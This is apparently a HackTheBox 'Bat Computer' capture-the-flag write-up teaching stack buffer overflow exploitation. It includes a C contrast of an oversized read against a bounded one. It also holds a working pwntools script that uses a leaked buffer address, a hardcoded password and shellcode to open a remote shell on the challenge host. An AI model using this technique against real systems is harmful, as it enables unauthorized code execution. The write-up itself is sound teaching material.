We covered a binary that has only PIE (Position Independent Executable) enabled as a protection, while NX was disabled. We analyzed the binary with Ghidra and GDB and discovered that it leaks the memory address of the variable used to store the user input. We also found that the binary reads up to 137 bytes of user input into a variable whose buffer is only 76 bytes, which is the core vulnerability of this app. We triggered a segmentation fault with that oversized input and found the offset to the saved return address to be 84 bytes. Based on this analysis, we built the exploitation script carrying the connection parameters and the final payload. This was part of HackTheBox Bat Computer | Intro to binary exploitation.
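The oversized-read defect described above, as an added example that is not the challenge binary's own source: the unsafe shape beside a bounded read, using the page's 76-byte buffer, 137-byte read limit and 84-byte offset to the saved return address. All function names, and the pipe-driven demo_safe_read helper, are constructed for illustration.

```c
/* Constructed example: the oversized-read pattern this page describes, in its
 * vulnerable and hardened forms. Not the challenge binary's source. */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE   76   /* destination buffer size from the page */
#define READ_LIMIT 137  /* bytes the vulnerable binary accepts */
#define RET_OFFSET 84   /* buffer start to saved return address, from the page */

/* Vulnerable shape: asks for more bytes than the buffer holds. With NX off and
 * the buffer address leaked, bytes past RET_OFFSET replace the return address.
 * Kept only for contrast; nothing here calls it. */
ssize_t read_input_vulnerable(int fd, char buf[BUF_SIZE]) {
    return read(fd, buf, READ_LIMIT);      /* 137 > 76: stack overflow */
}

/* Hardened shape: the read is bounded by the real buffer size, with one byte
 * reserved so the result is always NUL-terminated. */
ssize_t read_input_safe(int fd, char *buf, size_t bufsz) {
    if (bufsz == 0) return -1;
    ssize_t n = read(fd, buf, bufsz - 1);
    if (n < 0) return -1;
    buf[n] = '\0';
    return n;
}

/* Bytes of a read_limit-sized input that land on or past the return address:
 * a positive result means user input can rewrite the saved return address. */
long bytes_past_ret(size_t read_limit, size_t ret_offset) {
    return (long)read_limit - (long)ret_offset;    /* 137 - 84 = 53 */
}

/* Push `len` bytes of 'A' through a pipe into read_input_safe; returns how
 * many bytes the hardened reader actually kept (never more than BUF_SIZE-1). */
ssize_t demo_safe_read(size_t len) {
    int fds[2];
    if (pipe(fds) != 0) return -1;
    char *junk = malloc(len);
    if (junk == NULL) { close(fds[0]); close(fds[1]); return -1; }
    memset(junk, 'A', len);
    ssize_t w = write(fds[1], junk, len);
    close(fds[1]);
    char buf[BUF_SIZE];
    ssize_t n = (w == (ssize_t)len) ? read_input_safe(fds[0], buf, sizeof buf) : -1;
    close(fds[0]);
    free(junk);
    return n;    /* 75 for a 137-byte input: overflow bytes never hit the stack */
}
```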

Buffer Overflow Techniques Notes

The exploit code is below.

##Beginning

```python
from pwn import *

# Load the target so pwntools picks up its architecture for asm()/shellcraft
context.binary = ELF('./batcomputer')

con = remote('157.245.39.76', 31662)

# Option 1 prints the address of the input buffer; parse the hex value after "0x"
con.sendline(b'1')
con.recvuntil(b'0x')
stack_base = int('0x' + con.recv().decode('latin-1').split()[0], 16)
log.success(f'stack base: {hex(stack_base)}')

# Option 2 asks for the password before accepting the oversized input
con.sendline(b'2')
con.sendline(b'b4tp@$$w0rd!')

payload = asm(shellcraft.popad() + shellcraft.sh())  # shellcode placed at the start of the buffer
payload += b'A' * (84 - len(payload))                # padding up to the saved return address (offset 84)
payload += p64(stack_base)                           # leaked buffer address, where the shellcode sits

con.sendline(payload)

# Option 3 returns from the vulnerable function, jumping to the overwritten address
con.sendline(b'3')

con.interactive()
```

##Ending

Video Walkthrough